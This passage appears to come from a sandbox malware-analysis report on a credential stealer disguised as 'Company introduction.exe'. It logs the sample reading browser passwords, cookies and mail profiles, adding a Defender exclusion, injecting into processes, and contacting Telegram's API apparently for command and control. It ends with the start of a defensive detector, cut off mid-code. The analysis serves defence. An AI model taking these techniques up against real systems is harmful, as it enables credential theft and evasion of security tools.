Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Company introduction.exe | Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Users\user\Desktop\Company introduction.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeQueries volume information: C:\Users\user\AppData\Roaming\FzXKnGk.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeQueries volume information: C:\Users\user\AppData\Roaming\FzXKnGk.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\Company introduction.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                Source: Yara match | File source: 0000000C.00000002.2940815636.0000000003341000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.2941471703.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 7.2.FzXKnGk.exe.4405f58.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Company introduction.exe.4e9a600.4.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.FzXKnGk.exe.4448f78.2.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.FzXKnGk.exe.4448f78.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Company introduction.exe.4e575e0.3.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.FzXKnGk.exe.4405f58.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Company introduction.exe.4e9a600.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Company introduction.exe.4e575e0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: Company introduction.exe PID: 7452, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: Company introduction.exe PID: 7812, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: FzXKnGk.exe PID: 7888, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: FzXKnGk.exe PID: 8144, type: MEMORYSTR
                Source: Yara match | File source: 7.2.FzXKnGk.exe.4405f58.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Company introduction.exe.4e9a600.4.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.FzXKnGk.exe.4448f78.2.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.FzXKnGk.exe.4448f78.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Company introduction.exe.4e575e0.3.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.FzXKnGk.exe.4405f58.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Company introduction.exe.4e9a600.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Company introduction.exe.4e575e0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: Company introduction.exe PID: 7452, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: FzXKnGk.exe PID: 7888, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: FzXKnGk.exe PID: 8144, type: MEMORYSTR
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                Source: C:\Users\user\Desktop\Company introduction.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: C:\Users\user\Desktop\Company introduction.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: Yara match | File source: 7.2.FzXKnGk.exe.4405f58.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Company introduction.exe.4e9a600.4.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.FzXKnGk.exe.4448f78.2.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.FzXKnGk.exe.4448f78.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Company introduction.exe.4e575e0.3.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.FzXKnGk.exe.4405f58.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Company introduction.exe.4e9a600.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Company introduction.exe.4e575e0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.2941471703.00000000031AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.2940815636.000000000344C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: Company introduction.exe PID: 7452, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: Company introduction.exe PID: 7812, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: FzXKnGk.exe PID: 7888, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: FzXKnGk.exe PID: 8144, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match | File source: 0000000C.00000002.2940815636.0000000003341000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.2941471703.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 7.2.FzXKnGk.exe.4405f58.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Company introduction.exe.4e9a600.4.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.FzXKnGk.exe.4448f78.2.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.FzXKnGk.exe.4448f78.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Company introduction.exe.4e575e0.3.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.FzXKnGk.exe.4405f58.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Company introduction.exe.4e9a600.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Company introduction.exe.4e575e0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: Company introduction.exe PID: 7452, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: Company introduction.exe PID: 7812, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: FzXKnGk.exe PID: 7888, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: FzXKnGk.exe PID: 8144, type: MEMORYSTR
                Source: Yara match | File source: 7.2.FzXKnGk.exe.4405f58.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Company introduction.exe.4e9a600.4.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.FzXKnGk.exe.4448f78.2.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.FzXKnGk.exe.4448f78.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Company introduction.exe.4e575e0.3.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.FzXKnGk.exe.4405f58.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Company introduction.exe.4e9a600.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Company introduction.exe.4e575e0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: Company introduction.exe PID: 7452, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: FzXKnGk.exe PID: 7888, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: FzXKnGk.exe PID: 8144, type: MEMORYSTR
                MITRE ATT&CK Matrix (one tactic per column, numbers as shown in the report)

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 111 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 1 Query Registry | Remote Services | 1 Email Collection | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 Scheduled Task/Job | 11 Disable or Modify Tools | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 31 Virtualization/Sandbox Evasion | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 3 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 111 Process Injection | NTDS | 31 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 3 Obfuscated Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Software Packing | Cached Domain Credentials | 1 System Network Configuration Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 13 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Behavior Graph (ID 1591636, sample Company introduction.exe, start date 15/01/2025, architecture WINDOWS, score 100), rendered as text:

                Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 13 other signatures.
                Top-level DNS/IP: reallyfreegeoip.org (Tries to detect the country of the analysis system (by using the IP)); api.telegram.org (Uses the Telegram API (likely for C&C communication)); 2 other IPs or domains.

                Company introduction.exe (started)
                  dropped: C:\Users\user\AppData\Roaming\FzXKnGk.exe (PE32)
                  dropped: C:\Users\user\...\FzXKnGk.exe:Zone.Identifier (ASCII)
                  dropped: C:\Users\user\AppData\Local\...\tmpE629.tmp (XML)
                  dropped: C:\Users\...\Company introduction.exe.log (ASCII)
                  signatures: Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
                  -> powershell.exe (started)
                       signature: Loading BitLocker PowerShell Module
                       -> conhost.exe (started)
                       -> WmiPrvSE.exe (started)
                  -> Company introduction.exe (started; the injected child instance)
                       api.telegram.org 149.154.167.220, ports 443, 49766, 49773, TELEGRAMRU, United Kingdom
                       checkip.dyndns.com 193.122.6.168, ports 49733, 49737, 49738, ORACLE-BMC-31898US, United States
                       reallyfreegeoip.org 104.21.48.1, ports 443, 49734, 49735, CLOUDFLARENETUS, United States
                  -> schtasks.exe (started)
                       -> conhost.exe (started)

                FzXKnGk.exe (started; the dropped copy)
                  signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
                  -> FzXKnGk.exe (started)
                       signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
                  -> schtasks.exe (started)
                       -> conhost.exe (started)
                  -> FzXKnGk.exe (started)
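The process tree above is the host-side fingerprint of this dropper: a PowerShell child that adds a Defender exclusion, schtasks.exe registering a task from an XML file written to the user's Temp directory (tmpE629.tmp), and the sample re-launching its own image so the payload can be injected into it. The following is an added example, not part of the Joe Sandbox report: a small detector over process-creation events that flags those three patterns. The events are constructed, and the command-line arguments (the exclusion path, the task name, the -EncodedCommand form) are hypothetical, since the report shows the tree but not the argument strings.

```python
import base64
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the new process
    cmdline: str    # its command line


def _b64utf16(s: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(s.encode("utf-16-le")).decode()


# Constructed events modelled on the behavior graph above. Paths follow the report
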